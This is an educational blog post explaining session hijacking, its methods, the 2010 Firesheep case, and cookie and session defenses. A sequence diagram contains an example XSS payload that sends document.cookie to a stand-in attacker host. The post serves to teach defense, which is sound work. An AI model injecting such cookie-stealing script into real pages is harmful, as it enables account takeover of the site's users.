Luke a Pro

Luke Sun

Developer & Marketer

🇺🇦
EN||
© 2015–2026 Luke Sun.
All rights reserved.

Session Hijacking

Published: Sat Feb 01 2025 | Modified: Fri Feb 06 2026 , 3 minutes reading.

1. Definition

Session Hijacking (or Session Side-Jacking) is an attack where an intruder takes control of a user’s session. The attacker steals or predicts a valid Session ID (usually stored in a cookie) and uses it to impersonate the victim. The server believes it is communicating with the legitimate user.

2. Technical Explanation

HTTP is stateless. To maintain state (login status), servers issue a Session ID. If this ID is stolen, the “Key” to the account is lost. Passwords are irrelevant at this stage.

Common Methods:

  1. Session Sniffing: Intercepting unencrypted HTTP traffic (Wi-Fi).
  2. Cross-Site Scripting (XSS): document.cookie theft.
  3. Session Fixation: Attacker sets the victim’s session ID to a known value before they log in.
  4. Session Prediction: The ID generation algorithm is weak (e.g., sequential numbers).
sequenceDiagram
    participant Victim
    participant App as Web App
    participant Attacker

    Victim->>App: Login
    App-->>Victim: Set-Cookie: session=ABC123XYZ

    Note over Victim: Victim visits compromised page (XSS)
    
    Victim->>Attacker: GET /steal?cookie=ABC123XYZ
    Note right of Victim: Malicious Script executes:<br/>fetch('attacker.com?c=' + document.cookie)

    Attacker->>App: GET /account (Cookie: session=ABC123XYZ)
    Note right of Attacker: Attacker replays the stolen cookie
    
    App-->>Attacker: 200 OK (Victim's Dashboard)

4. Real-World Case Study: Firesheep (2010)

Context: The Era of HTTP-only Web. Vulnerability Class: Session Side-Jacking (Unencrypted Transport).

The Tool: In 2010, Eric Butler released Firesheep, a Firefox extension. At that time, sites like Facebook and Twitter used HTTPS for login but reverted to HTTP for the session. Firesheep sniffed open Wi-Fi traffic (like in a coffee shop) for unencrypted session cookies. It presented a sidebar of logged-in users nearby. A user could double-click a name and instantly become that user on Facebook.

Impact: It forced the entire industry to adopt HTTPS Everywhere (HSTS) and secure cookies, marking the end of mixed-content sessions.

5. Detailed Defense Strategies

Configure the session cookie with strict flags:

  • Secure: The cookie is ONLY sent over encrypted HTTPS connections. Prevents sniffing.
  • HttpOnly: The cookie CANNOT be accessed by JavaScript (document.cookie). Prevents XSS theft.
  • SameSite: (Strict or Lax) Prevents CSRF and some leakage.
Set-Cookie: session_id=...; Secure; HttpOnly; SameSite=Lax

B. Session Rotation (Regeneration)

Always generate a new Session ID immediately after a successful login.

  • Prevents Session Fixation. If an attacker injected a session ID before login, it becomes invalid the moment the user authenticates.

C. Short Session Lifetimes

  • Idle Timeout: Log out after 15-30 minutes of inactivity.
  • Absolute Timeout: Force re-authentication after a fixed period (e.g., 24 hours).

D. Session Binding (Advanced)

Bind the session ID to client properties (User-Agent, IP Subnet).

  • Check: If a request comes with the same Cookie but a different User-Agent, invalidate the session.

6. References